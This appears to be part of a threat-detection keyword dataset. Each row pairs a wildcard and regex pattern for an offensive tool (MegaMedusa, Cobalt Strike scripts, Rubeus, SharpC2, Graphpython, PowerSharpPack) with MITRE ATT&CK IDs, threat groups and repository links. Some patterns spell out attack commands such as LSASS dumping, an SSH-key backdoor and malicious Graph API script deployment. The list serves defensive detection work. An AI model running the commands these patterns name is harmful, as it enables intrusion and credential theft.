"*com/MuRongPIG/Proxy-Master/main/http.txt*",".{0,1000}com\/MuRongPIG\/Proxy\-Master\/main\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38643" "*com/officialputuid/KangProxy/KangProxy/http/http.txt*",".{0,1000}com\/officialputuid\/KangProxy\/KangProxy\/http\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - 
T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38644" "*com/opsxcq/proxy-list/master/list.txt*",".{0,1000}com\/opsxcq\/proxy\-list\/master\/list\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38645" "*com/proxylist-to/proxy-list/main/http.txt*",".{0,1000}com\/proxylist\-to\/proxy\-list\/main\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38646" "*com/prxchk/proxy-list/main/http.txt*",".{0,1000}com\/prxchk\/proxy\-list\/main\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38647" "*com/roosterkid/openproxylist/main/HTTPS_RAW.txt*",".{0,1000}com\/roosterkid\/openproxylist\/main\/HTTPS_RAW\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38648" "*com/ShiftyTR/Proxy-List/master/http.txt*",".{0,1000}com\/ShiftyTR\/Proxy\-List\/master\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - 
T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38649" "*com/ShiftyTR/Proxy-List/master/https.txt*",".{0,1000}com\/ShiftyTR\/Proxy\-List\/master\/https\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38650" "*com/TheSpeedX/PROXY-List/master/http.txt*",".{0,1000}com\/TheSpeedX\/PROXY\-List\/master\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38651" "*com/yuceltoluyag/GoodProxy/main/raw.txt*",".{0,1000}com\/yuceltoluyag\/GoodProxy\/main\/raw\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38652" "*com_exec_go(*",".{0,1000}com_exec_go\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","38653" "*combine_harvester-main*",".{0,1000}combine_harvester\-main.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","38654" "*com-exec.cna*",".{0,1000}com\-exec\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","38655" "*COMHunter* -inproc*",".{0,1000}COMHunter.{0,1000}\s\-inproc.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38656" "*COMHunter* -localserver*",".{0,1000}COMHunter.{0,1000}\s\-localserver.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38657" 
"*COMHunter.csproj*",".{0,1000}COMHunter\.csproj.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38658" "*COMHunter.exe*",".{0,1000}COMHunter\.exe.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38659" "*COMHunter.sln*",".{0,1000}COMHunter\.sln.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38660" "*COM-Hunter_v*.zip*",".{0,1000}COM\-Hunter_v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","38661" "*COM-Hunter-main*",".{0,1000}COM\-Hunter\-main.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","38662"
"*COMInjectDotNet.exe*",".{0,1000}COMInjectDotNet\.exe.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","38663" "*-Command ""New-NetFirewallRule -DisplayName 'Windows Update' -Direction Outbound -Action Allow*",".{0,1000}\-Command\s\""New\-NetFirewallRule\s\-DisplayName\s\'Windows\sUpdate\'\s\-Direction\sOutbound\s\-Action\sAllow.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38664" "*-Command ""--signature --driver""*",".{0,1000}\-Command\s\""\-\-signature\s\-\-driver\"".{0,1000}","offensive_tool_keyword","PowerSharpPack","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","38665" "*-command *.exe* -technique ccmstp*",".{0,1000}\-command\s.{0,1000}\.exe.{0,1000}\s\-technique\sccmstp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","38666" "*--command assign-privilegedrole --token *",".{0,1000}\-\-command\sassign\-privilegedrole\s\-\-token\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - 
T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38668" "*--command backdoor-script --id *",".{0,1000}\-\-command\sbackdoor\-script\s\-\-id\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38669" "*--command deploy-maliciousscript --script *",".{0,1000}\-\-command\sdeploy\-maliciousscript\s\-\-script\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38670" "*--command invoke-reconasoutsider --domain *",".{0,1000}\-\-command\sinvoke\-reconasoutsider\s\-\-domain\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38671" "*--command invoke-userenumerationasoutsider --username *",".{0,1000}\-\-command\sinvoke\-userenumerationasoutsider\s\-\-username\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 
- T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38672" "*--command spoof-owaemailmessage *",".{0,1000}\-\-command\sspoof\-owaemailmessage\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38673" "*command_obfuscator.py*",".{0,1000}command_obfuscator\.py.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","38675" "*command=*###---POWERSHELL---*eval $(echo *",".{0,1000}command\=.{0,1000}\#\#\#\-\-\-POWERSHELL\-\-\-.{0,1000}eval\s\$\(echo\s.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - FANCY BEAR","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","38676" "*CommandAndControl_*.py*",".{0,1000}CommandAndControl_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - 
T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","38677" "*CommandCam.exe /devlist > *\CC.log*",".{0,1000}CommandCam\.exe\s\/devlist\s\>\s.{0,1000}\\CC\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","38678" "*CommandCam.exe*",".{0,1000}CommandCam\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","38679" "*commandovm.*.installer.fireeye*",".{0,1000}commandovm\..{0,1000}\.installer\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","38681" "*commando-vm-master*",".{0,1000}commando\-vm\-master.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully 
customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","38682" "*Commands/Brute.*",".{0,1000}Commands\/Brute\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38683" "*Commands/Createnetonly.*",".{0,1000}Commands\/Createnetonly\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38684" "*Commands/DcomCommand.*",".{0,1000}Commands\/DcomCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38685" "*Commands/DroneCommand.*",".{0,1000}Commands\/DroneCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38686" "*Commands/ExecuteAssembly.*",".{0,1000}Commands\/ExecuteAssembly\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38687" "*Commands/KillProcess.*",".{0,1000}Commands\/KillProcess\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38688" "*Commands/ListProcesses.*",".{0,1000}Commands\/ListProcesses\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38689" "*Commands/Logonsession.*",".{0,1000}Commands\/Logonsession\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38690" "*Commands/PowerShellImport.*",".{0,1000}Commands\/PowerShellImport\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38691" "*Commands/Preauthscan.*",".{0,1000}Commands\/Preauthscan\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38692" "*Commands/PrintWorkingDirectory.*",".{0,1000}Commands\/PrintWorkingDirectory\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38693" "*Commands/PsExecCommand.*",".{0,1000}Commands\/PsExecCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38694" "*Commands/RevToSelf.*",".{0,1000}Commands\/RevToSelf\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38695" "*Commands/RunPe.*",".{0,1000}Commands\/RunPe\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - 
T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38696" "*Commands/SetSleep.*",".{0,1000}Commands\/SetSleep\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38697" "*Commands/Shell.*",".{0,1000}Commands\/Shell\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38698" "*Commands/ShInject.*",".{0,1000}Commands\/ShInject\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38699" "*Commands/ShSpawn.*",".{0,1000}Commands\/ShSpawn\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38700" "*Commands/Silver.*",".{0,1000}Commands\/Silver\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
